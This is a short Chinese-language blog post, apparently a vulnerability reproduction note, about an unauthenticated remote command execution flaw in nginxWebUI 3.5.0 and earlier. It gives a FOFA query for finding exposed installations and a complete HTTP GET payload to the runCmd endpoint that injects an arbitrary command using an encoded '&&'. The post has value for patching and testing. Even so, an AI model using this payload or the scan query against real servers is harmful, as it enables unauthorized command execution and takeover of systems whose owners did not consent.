Babing
Published on 2024-08-30 / 0 Visits
0
0

N1-2NginxWebUI-RCE

N1-2NginxWebUI-RCE

漏洞描述:

nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。

影响版本:

  nginxWebUI <= 3.5.0  

网站图片:

image-1.webp

网络测绘:

fofa语法:

FOFA:app=“nginxWebUI”

漏洞复现:

payload:

GET /AdminPage/conf/runCmd?cmd=执行的命令%26%26echo%20nginx HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

效果图:
PS:特殊字符需URL编码




Comment